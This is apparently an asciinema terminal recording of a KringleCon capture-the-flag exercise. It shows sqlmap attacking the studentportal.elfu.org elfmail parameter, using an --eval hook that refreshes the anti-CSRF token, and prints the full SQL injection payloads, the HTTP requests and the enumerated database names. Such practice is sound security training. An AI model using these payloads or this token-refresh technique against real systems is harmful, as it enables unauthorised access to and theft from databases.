{"version": 2, "width": 118, "height": 34, "timestamp": 1578635094, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.008724, "o", "\u001b]0;slingshot@slingshot: ~/Desktop/Kringlecon/sqlmap-dev\u0007slingshot@slingshot:~/Desktop/Kringlecon/sqlmap-dev$ "]
[1.709254, "o", "python3 sqlmap.py -u \"https://studentportal.elfu.org/application-c\rcheck.php?elfmail=1&token=1\"  -p elfmail --dbms=MariaDB --eval=\"import requests; r = requests.get('https://studentporta\ral.elfu.org/validator.php');token = r.text;\" -v 4 --dbs"]
[2.55485, "o", "\r\n"]
[2.888563, "o", "\u001b[01;33m        ___\r\n       __H__\r\n ___ ___[\u001b[01;41m,\u001b[01;49m]_____ ___ ___  \u001b[01;37m{\u001b[01;33m1.4.1.21#dev\u001b[01;37m}\u001b[01;33m\r\n|_ -| . [\u001b[01;41m(\u001b[01;49m]     | .'| . |\r\n|___|_  [\u001b[01;41m(\u001b[01;49m]_|_|_|__,|  _|\r\n      |_|V...       |_|   \u001b[0m\u001b[4;37mhttp://sqlmap.org\u001b[0m\r\n\r\n"]
[2.97289, "o", "[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n"]
[2.972994, "o", "[*] starting @ 05:44:57 /2020-01-10/\r\n\r\n"]
[2.973549, "o", "\r[\u001b[36m05:44:57\u001b[0m] [\u001b[34mDEBUG\u001b[0m] cleaning up configuration parameters\r\n"]
[2.979896, "o", "\r[\u001b[36m05:44:57\u001b[0m] [\u001b[34mDEBUG\u001b[0m] setting the HTTP timeout\r\n"]
[2.979974, "o", "\r[\u001b[36m05:44:57\u001b[0m] [\u001b[34mDEBUG\u001b[0m] setting the HTTP User-Agent header\r\n"]
[2.980114, "o", "\r[\u001b[36m05:44:57\u001b[0m] [\u001b[34mDEBUG\u001b[0m] creating HTTP requests opener object\r\n"]
[2.981293, "o", "\r[\u001b[36m05:44:57\u001b[0m] [\u001b[34mDEBUG\u001b[0m] forcing back-end DBMS to user defined value\r\n"]
[3.136828, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[34mDEBUG\u001b[0m] resolving hostname '\u001b[37mstudentportal.elfu.org\u001b[0m'\r\n"]
[3.214876, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[32mINFO\u001b[0m] testing connection to the target URL\r\n"]
[3.405953, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#1\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1&token=MTAxMDMyNjQ2MjcyMTU3ODYzNTA5ODEwMTAzMjY0Ni4yNzI=_MTI5MzIxNzg3MjI4MTYzMjMzMDQ0NjgwLjcwNA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[3.513099, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[34mDEBUG\u001b[0m] declared web page charset '\u001b[37mutf-8\u001b[0m'\r\n"]
[3.563041, "o", "sqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: elfmail (GET)\r\n    Type: boolean-based blind\r\n    Title: AND boolean-based blind - WHERE or HAVING clause\r\n    Payload: elfmail=1' AND 1817=1817 AND 'VsQU'='VsQU&token=1\r\n    Vector: AND [INFERENCE]\r\n\r\n    Type: error-based\r\n    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n    Payload: elfmail=1' AND (SELECT 6257 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6257=6257,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kcsP'='kcsP&token=1\r\n    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)\r\n\r\n    Type: time-based blind\r\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n    Payload: elfmail=1' AND (SELECT 2136 FROM (SELECT(SLEEP(5)))DMUR) AND 'eZch'='eZch&token=1\r\n    Vector: AND (SELECT [RANDNUM] FROM "]
[3.563122, "o", "(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])\r\n---\r\n"]
[3.563466, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[32mINFO\u001b[0m] testing MySQL\r\n"]
[3.567342, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[34mDEBUG\u001b[0m] resuming configuration option 'string' ('\u001b[37mYour application is still pending!\u001b[0m')\r\n"]
[3.572024, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[34mDEBUG\u001b[0m] searching for error chunk length...\r\n"]
[3.574562, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT REPEAT(0x34,1024)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OGGk'='OGGk\r\n"]
[3.685567, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#2\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%202158%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20REPEAT%280x34%2C1024%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27OGGk%27%3D%27OGGk&token=MTAxMDMyNjQ2MjcyMTU3ODYzNTA5ODEwMTAzMjY0Ni4yNzI=_MTI5MzIxNzg3MjI4MTYzMjMzMDQ0NjgwLjcwNA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[3.819118, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[33mWARNING\u001b[0m] reflective value(s) found and filtering out\r\n"]
[3.821321, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 5217 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT REPEAT(0x32,512)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nvmf'='nvmf\r\n"]
[3.926916, "o", "\r[\u001b[36m05:44:58\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#3\u001b[0m]:\r"]
[3.927239, "o", "\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%205217%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20REPEAT%280x32%2C512%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27nvmf%27%3D%27nvmf&token=MTAxMDMyNjQ2MjcyMTU3ODYzNTA5ODEwMTAzMjY0Ni4yNzI=_MTI5MzIxNzg3MjI4MTYzMjMzMDQ0NjgwLjcwNA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[4.098201, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 7845 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT REPEAT(0x36,256)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TqrJ'='TqrJ\r\n"]
[4.203876, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#4\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%207845%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20REPEAT%280x36%2C256%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27TqrJ%27%3D%27TqrJ&token=MTAxMDMyNjQ2MzM2MTU3ODYzNTA5OTEwMTAzMjY0Ni4zMzY=_MTI5MzIxNzg3MzEwMDgzMjMzMDQ0NjgyLjc1Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[4.323877, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 5927 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT REPEAT(0x34,54)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'cqVW'='cqVW\r\n"]
[4.443358, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#5\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%205927%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20REPEAT%280x34%2C54%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27cqVW%27%3D%27cqVW&token=MTAxMDMyNjQ2MzM2MTU3ODYzNTA5OTEwMTAzMjY0Ni4zMzY=_MTI5MzIxNzg3MzEwMDgzMjMzMDQ0NjgyLjc1Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[4.581866, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 7971 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (QUARTER(NULL) IS NULL) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pSQc'='pSQc\r\n"]
[4.689455, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#6\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%207971%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28QUARTER%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27pSQc%27%3D%27pSQc&token=MTAxMDMyNjQ2MzM2MTU3ODYzNTA5OTEwMTAzMjY0Ni4zMzY=_MTI5MzIxNzg3MzEwMDgzMjMzMDQ0NjgyLjc1Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[4.833055, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 5 queries in 1.27 seconds"]
[4.83339, "o", "\r\n"]
[4.83379, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[32mINFO\u001b[0m] confirming MySQL\r\n"]
[4.834761, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 5483 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (SESSION_USER() LIKE USER()) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sKGy'='sKGy\r\n"]
[4.949585, "o", "\r[\u001b[36m05:44:59\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#7\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%205483%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28SESSION_USER%28%29%20LIKE%20USER%28%29%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27sKGy%27%3D%27sKGy&token=MTAxMDMyNjQ2MzM2MTU3ODYzNTA5OTEwMTAzMjY0Ni4zMzY=_MTI5MzIxNzg3MzEwMDgzMjMzMDQ0NjgyLjc1Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.07132, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 1 queries in 0.24 seconds\r\n"]
[5.072535, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZFuz'='ZFuz\r\n"]
[5.184789, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#8\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%202488%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27ZFuz%27%3D%27ZFuz&token=MTAxMDMyNjQ2NDAwMTU3ODYzNTEwMDEwMTAzMjY0Ni40_MTI5MzIxNzg3MzkyMDAzMjMzMDQ0Njg0Ljg= HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.326326, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 1 queries in 0.25 seconds\r\n"]
[5.327775, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 1372 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qXFi'='qXFi\r\n"]
[5.462785, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#9\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%201372%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27qXFi%27%3D%27qXFi&token=MTAxMDMyNjQ2NDAwMTU3ODYzNTEwMDEwMTAzMjY0Ni40_MTI5MzIxNzg3MzkyMDAzMjMzMDQ0Njg0Ljg= HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.592562, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 1 queries in 0.27 seconds\r\n"]
[5.594188, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,3423,NULL))) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OjAz'='OjAz\r\n"]
[5.733099, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#10\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%202896%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28ISNULL%28TIMESTAMPADD%28MINUTE%2C3423%2CNULL%29%29%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27OjAz%27%3D%27OjAz&token=MTAxMDMyNjQ2NDAwMTU3ODYzNTEwMDEwMTAzMjY0Ni40_MTI5MzIxNzg3MzkyMDAzMjMzMDQ0Njg0Ljg= HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.821868, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 1 queries in 0.23 seconds\r\n"]
[5.823759, "o", "\r[\u001b[36m05:45:00\u001b[0m]\u001b[1m [\u001b[32;1mINFO\u001b[0m]\u001b[1m the back-end DBMS is MySQL\u001b[0m\r\n"]
[5.823933, "o", "back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)\r\n"]
[5.82422, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[32mINFO\u001b[0m] fetching database names\r\n"]
[5.827141, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 8590 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BXZP'='BXZP"]
[5.82741, "o", "\r\n"]
[5.944718, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#11\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%208590%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20IFNULL%28CAST%28COUNT%28schema_name%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27BXZP%27%3D%27BXZP&token=MTAxMDMyNjQ2NDAwMTU3ODYzNTEwMDEwMTAzMjY0Ni40_MTI5MzIxNzg3MzkyMDAzMjMzMDQ0Njg0Ljg= HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[6.034905, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[32mINFO\u001b[0m] used SQL query returns 2 entries\r\n"]
[6.035881, "o", "\r[\u001b[36m05:45:00\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 2511 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bSnD'='bSnD\r\n"]
[6.146847, "o", "\r[\u001b[36m05:45:01\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#12\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%202511%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2C1%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27bSnD%27%3D%27bSnD&token=MTAxMDMyNjQ2NDY0MTU3ODYzNTEwMTEwMTAzMjY0Ni40NjQ=_MTI5MzIxNzg3NDczOTIzMjMzMDQ0Njg2Ljg0OA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[6.232369, "o", "[\u001b[36m05:45:01\u001b[0m] [\u001b[32mINFO\u001b[0m] retrieved: '\u001b[37melfu\u001b[0m'\r\n"]
[6.23442, "o", "\r[\u001b[36m05:45:01\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 6002 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cfob'='Cfob\r\n"]
[6.351148, "o", "\r[\u001b[36m05:45:01\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#13\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%206002%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201%2C1%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27Cfob%27%3D%27Cfob&token=MTAxMDMyNjQ2NDY0MTU3ODYzNTEwMTEwMTAzMjY0Ni40NjQ=_MTI5MzIxNzg3NDczOTIzMjMzMDQ0Njg2Ljg0OA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[6.439121, "o", "[\u001b[36m05:45:01\u001b[0m] [\u001b[32mINFO\u001b[0m] retrieved: '\u001b[37minformation_schema\u001b[0m'\r\n"]
[6.449254, "o", "\r[\u001b[36m05:45:01\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 3 queries in 0.62 seconds\r\n"]
[6.449428, "o", "available databases [2]:\r\n"]
[6.449579, "o", "[*] elfu\r\n[*] information_schema\r\n\r\n"]
[6.449817, "o", "\r[\u001b[36m05:45:01\u001b[0m] [\u001b[32mINFO\u001b[0m] fetched data logged to text files under '\u001b[37m/home/slingshot/.sqlmap/output/studentportal.elfu.org\u001b[0m'\r\n"]
[6.449938, "o", "\r\n[*] ending @ 05:45:01 /2020-01-10/\r\n\r\n"]
[6.453603, "o", "\u001b]0;slingshot@slingshot: ~/Desktop/Kringlecon/sqlmap-dev\u0007slingshot@slingshot:~/Desktop/Kringlecon/sqlmap-dev$ "]
[13.712168, "o", "e"]
[13.924191, "o", "x"]
[14.095337, "o", "i"]
[14.300999, "o", "t"]
[14.555925, "o", "\r\nexit\r\n"]
